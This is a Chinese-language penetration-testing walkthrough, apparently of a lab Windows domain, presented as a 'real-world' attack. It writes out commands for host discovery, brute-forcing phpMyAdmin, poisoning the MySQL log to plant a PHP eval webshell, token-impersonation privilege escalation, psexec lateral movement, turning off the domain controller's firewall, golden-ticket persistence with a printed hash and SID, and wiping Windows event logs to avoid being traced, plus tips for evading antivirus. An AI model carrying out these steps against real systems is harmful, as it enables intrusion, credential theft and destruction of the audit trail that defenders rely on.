考虑到是实战环境就在不知道win7和winserver的密码的条件下打了
以上是我的网卡和ip配置
首先探测一下当前网段有什么主机存活(存活ip探测)
netdiscover -i eth0 -r 192.168.52.0/24

可以看到130的ip存活
使用攻击机kali自带的 nmap 进行端口扫描
nmap -sS -A -n -T4 -p- 192.168.17.130
发现80端口存活

访问一下当前ip的80端口发现真的起了web服务

下面发现有登录框

直接双payload爆破一下:

成功发现用户名和密码是root 和 admin123
扫描一下后台发现的确存在phpmyadmin的登录窗口,用我们扫描出来的账号密码登录

御剑扫一下发现出现phpmyadmin,那么直接访问一下

登陆成功
看到页面存在sql,来执行命令
日志污染打外网写webshell
具体命令如下:
1.查看日志位置
show variables like '%general%';

可以看到位置不在www,读写权限也没打开
下面依次修改路径,打开权限:
修改路径:
set global general_log_file="C:\\phpStudy\\WWW\\shell.php"
(shell.php太明显最好改成别的名字防止被杀软秒杀)
打开权限:
set global general_log="On"
改完之后再查看一下发现文件路径和权限就都对了:

写入一句话木马:
SELECT '<?php eval($_POST["cmd"])?>'

写入之后蚁剑连接

成功进入web服务器
内网渗透
上线cs会话

利用插件lstar进行烂土豆提权(JuicyPotato)或者printspoofer或者(ms14-058提取)都可以


下一步横向移动
先抓取明文密码
看到已经抓取到了

探测存活ip,发现域控的存活

查看域控制器的信息

刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道。
SMB监听隧道的核心原理是利用SMB协议在目标主机上建立隐蔽的通信通道,绕过传统防火墙和入侵检测系统的监控。
SMB协议基础:文件共享,域名解析等,默认通过445端口通信
1.创建SMB监听器

2.切换攻击目标列表

3. 右建选择—> 横向移动 —> psexec

4.添加 用户名 密码 域名 -> 监听器 -> 对端连接的隧道
监听器选择我们刚刚创建的SMB监听器,对端连接的隧道选择system权限的

横向成功,进入域控,记得养成好习惯关防火墙。

shell netsh advfirewall set allprofiles state off

权限维持(黄金票据)
黄金票据是指能够绕过认证授权机制并获得所需权限的票据。这种票据可以被攻击者收集和利用,从而从系统内部获取高权限,甚至完全控制系统。
抓取 Hash 还有明文密码
把SID,域名,复制下来等下黄金票据要用
hash: 58e91a5ac358d86513ab224312314061:::

SID: S-1-5-21-2952760202-1353902439-2381784089-1000

域名:GOD.ORG
黄金票据配置
凭证提权—>黄金票据

把刚刚复制的域名,SID粘贴上去,hash已经帮你自动抓取了,用户名随便

ok成功

痕迹清除
在渗透过程中,痕迹清除非常非常重要,不清除万一被溯源,容易被ban
shell wevtutil cl security //清理安全日志
shell wevtutil cl system //清理系统日志
shell wevtutil cl application //清理应用程序日志
shell wevtutil cl "windows powershell" //清除power shell日志
shell wevtutil cl Setup //清除(cl)事件日志中的 "Setup" 事件。